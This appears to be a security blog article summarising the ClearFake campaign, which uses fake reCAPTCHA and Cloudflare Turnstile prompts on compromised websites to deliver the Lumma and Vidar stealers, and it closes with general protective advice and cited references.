The ClearFake malware campaign has emerged as a significant cybersecurity threat, compromising over 9,300 websites and employing deceptive tactics to distribute malicious software. By masquerading as legitimate reCAPTCHA or Cloudflare Turnstile verifications, ClearFake tricks users into downloading information-stealing malware such as Lumma Stealer and Vidar Stealer (The Hacker News).
Evolution of ClearFake
Initially identified in July 2023, ClearFake utilized fake browser update prompts on compromised WordPress sites to deliver malware. Over time, the campaign has incorporated advanced techniques like EtherHiding, which leverages Binance Smart Chain (BSC) contracts to retrieve payloads, enhancing the attack’s resilience and complicating detection efforts (The Hacker News).
By May 2024, ClearFake introduced the ClickFix tactic, a social engineering method that deceives users into executing malicious PowerShell commands under the pretense of resolving fictitious technical issues. This approach has been further refined with additional interactions involving the BSC, including system fingerprinting and the retrieval of encrypted malicious code hosted on platforms like Cloudflare Pages (The Hacker News).
Current Impact
As of February 2025, ClearFake has compromised at least 9,300 websites, with its operators continually updating the framework’s code, lures, and payloads daily. The malware now relies on multiple data points stored within the Binance Smart Chain, such as JavaScript code, AES keys, URLs for lure HTML files, and ClickFix PowerShell commands. This evolution underscores the campaign’s persistent and adaptive nature, posing a significant risk to users worldwide (The Hacker News).
Distribution of Lumma Stealer and Vidar Stealer
ClearFake’s primary payloads, Lumma Stealer and Vidar Stealer, are sophisticated information-stealing malware strains. Lumma Stealer, written in C, is designed to extract a wide array of data from compromised systems, including credentials, cryptocurrency wallets, and system information (Cyfirma). Vidar Stealer operates similarly, focusing on harvesting sensitive information and facilitating further malicious activities (Cyfirma).
Protective Measures
To safeguard against threats like ClearFake, users and organizations should adopt the following practices:
- Exercise Caution with Online Prompts: Be skeptical of unexpected prompts for software updates or security verifications, especially those encountered on unfamiliar or untrusted websites.
- Maintain Updated Software: Regularly update operating systems, browsers, and security software to protect against known vulnerabilities.
- Implement Robust Security Protocols: Utilize comprehensive security solutions that include real-time threat detection and response capabilities.
- Educate Users: Provide training on recognizing phishing attempts and social engineering tactics to reduce the likelihood of successful attacks.
For a more detailed analysis of the ClearFake campaign and its methodologies, refer to the comprehensive coverage by The Hacker News.
References
The Hacker News. (2025, March). ClearFake infects 9,300 sites, uses fake reCAPTCHA lures to deploy malware. Retrieved from https://thehackernews.com/2025/03/clearfake-infects-9300-sites-uses-fake.html?m=1
Cyfirma. (n.d.). Lumma Stealer: Tactics, impact, and defense strategies. Retrieved from https://www.cyfirma.com/research/lumma-stealer-tactics-impact-and-defense-strategies/
Cyfirma. (n.d.). Vidar Stealer: An in-depth analysis of an information-stealing malware. Retrieved from https://www.cyfirma.com/research/vidar-stealer-an-in-depth-analysis-of-an-information-stealing-malware/
